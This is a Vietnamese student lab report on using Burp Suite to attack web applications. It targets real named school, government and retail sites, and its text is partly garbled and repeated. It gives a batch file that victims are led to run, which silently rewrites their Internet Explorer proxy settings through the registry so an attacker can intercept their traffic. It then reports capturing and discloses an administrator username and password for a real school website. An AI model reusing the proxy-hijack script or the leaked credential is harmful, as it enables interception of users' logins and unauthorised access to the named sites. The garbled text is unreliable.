SỬ DỤNG BURPSUITE TẤN CÔNG VÀO ỨNG DỤNG WEB I. Giới thiệu BURPSUITE BURPSUITE là một công cụ hiệu quả để tấn công vào các ứng dụng web. Sử dụng BURPSUITE để liệt kê các chức năng, phân tích các nguy cơ tiềm ẩn, khám phá các lỗ hổng, chèn các mã lệnh. BURPSUITE dùng các công cụ, tính năng như: Spider: Nhện bò loang Duyệt , liệt kê các chức năng, danh mục; Intruder: Dùng để tấn công, chèn mã lệnh Repeater: Lặp lại các cuộc tấn công đến một host Bạn có thể download phiên bản BurpSuite free edition v1.4.01 tại đây: http:portswigger.netburpdownload.html
ĐẠI HỌC QUỐC GIA HÀ NỘI TRƯỜNG ĐẠI HỌC CÔNG NGHỆ - - BÁO CÁO THỰC HÀNH MÔN HỌC AN NINH MẠNG Học viên: Nguyễn Minh Hướng Lớp: K17 MMT Giáo viên: TS Nguyễn Đại Thọ Hà Nội - 2012 SỬ DỤNG BURPSUITE TẤN CÔNG VÀO ỨNG DỤNG WEB I Giới thiệu BURPSUITE BURPSUITE công cụ hiệu để công vào ứng dụng web Sử dụng BURPSUITE để liệt kê chức năng, phân tích nguy tiềm ẩn, khám phá lỗ hổng, chèn mã lệnh BURPSUITE dùng cơng cụ, tính như: Spider: Nhện bò loang -Duyệt , liệt kê chức năng, danh mục; Intruder: Dùng để công, chèn mã lệnh Repeater: Lặp lại công đến host Bạn download phiên BurpSuite free edition v1.4.01 đây: http://portswigger.net/burp/download.html Lưu thư mục tai ổ C:\ giải nén , ta có tệp Chú ý: Burp Suite địi hỏi mơi trường chạy Java Nó địi hỏi phiên Java tối thiểu 1.5 Bạn download Java địa miễn phí: http://www.oracle.com/technetwork/java/javase/downloads/index Kích chuột vào Suite.bat để chạy chương trình Cửa sổ giao diện BurpSuite: II Cấu hình sử dụng BurpSuite Với trình duyệt IE Trong Internet Explorer, chọn Tools -> Internet Options -> Connections ->LAN settings Đảm bảo “Automatically detect settings” “Use automatic confi guration script” không đánh dấu kiểm Đảm bảo “Use a proxy server for your LAN” có đáng dấu kiểm Tại Address đáng địa 127.0.0.1 Port 80 Vào Advanced, đánh dấu mục “Use the same proxy server for all protocols” box is checked Với trình duyệt Google Chrome Ta thiết lập Options -> Under the Bonnet -> Network -> Change Proxy Settings III Dùng BurpSuite để công ứng dụng web Liệt kê chức năng, danh mục phân tích Tại Host ta gõ địa mà ta muốn xét: c3ngochoi.edu.vn (web site trường THPT Ngọc Hồi) http://hanoi.edu.vn/ (web site Sở GDĐT Hà Nôi) http://hchomecenter.com.vn/ (website trung tâm siêu thị HC) Tại ta kích chuột vào Go ghi chép lại kết quả: Kết thu vào trang http://c3ngochoi.edu.vn/ Kết thu vào trang http://hanoi.edu.vn/ Kết thu vào trang http://hchomecenter.com.vn/ Giả mạo Proxy, lấy mật a Thiết lập proxy cho người dùng - Để toàn nội dung người dùng truy cập web qua Intercept Proxy cần phải thiết lập proxy trình duyệt người dùng - Hướng người dùng chạy file.exe thiết lập proxy Tạo file.bat với nội dung: Code: echo Windows Registry Editor Version 5.00 > echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] >2 echo "MigrateProxy"=dword:00000001 > echo "ProxyEnable"=dword:00000001 > echo "ProxyHttp1.1"=dword:00000000 > echo "ProxyServer"="IP:port" > echo "ProxyOverride"="" > copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg del /f /q del /f /q del /f /q del /f /q del /f /q del /f /q del /f /q regedit.exe /s b.reg del b.reg /f /q - Đặt tên file bất kỳ, ví dụ just.bat - Khi người dùng nhấn vào file tự động thiết lập proxy cho IE với địa IP mà ta thiết lập, Port port Proxy sử dụng Chuyển sang tab Intercept để cấu hình mode hoạt động Intercepting proxy - Chế độ Intercept on: chế độ hoạt động Nếu người đặt máy tính làm proxy tồn q trình truy cập internet bị proxy quản lý Khi request từ trình duyệt tới Proxy, phát nội dung chỉnh sửa forward tới máy chủ web Để chế độ để lưu lại thông tin người dùng truy cập web Mở web site http://c3ngochoi.edu.vn/login.asp Đăng nhập user password truy nhập b Vào Proxy tìm thơng tin Username Password - Vào Burpsuite Chuyển sang tab “Target” Chọn Site Map Lựa chọn trang web http://c3ngochoi.edu.vn/login.asp Nhìn chuyển sang bên phải chọn “Request” (thông tin gửi lên server) vào mục Raw thấy thông tin Username Password Sau thực bước, ta lấy tài khoản người quản trị với: User: admin Password: 300378 III Lời tựa Do Burp suite free edition dùng thử, cịn hạn chế chức cơng cụ Dẫn đến nhiều hạn chế thực thao tác Tuy nhiên cũng cơng cụ hữu ích cho việc phát lỗ hổng, phân tích nguy tiềm ẩn ... kích chuột vào Go ghi chép lại kết quả: Kết thu vào trang http://c3ngochoi.edu.vn/ Kết thu vào trang http://hanoi.edu.vn/ Kết thu vào trang http://hchomecenter.com.vn/ Giả mạo Proxy, lấy mật... tin Username Password - Vào Burpsuite Chuyển sang tab “Target” Chọn Site Map Lựa chọn trang web http://c3ngochoi.edu.vn/login.asp Nhìn chuyển sang bên phải chọn “Request” (thông tin gửi lên... Port 80 Vào Advanced, đánh dấu mục “Use the same proxy server for all protocols” box is checked Với trình duyệt Google Chrome Ta thiết lập Options -> Under the Bonnet -> Network -> Change Proxy Settings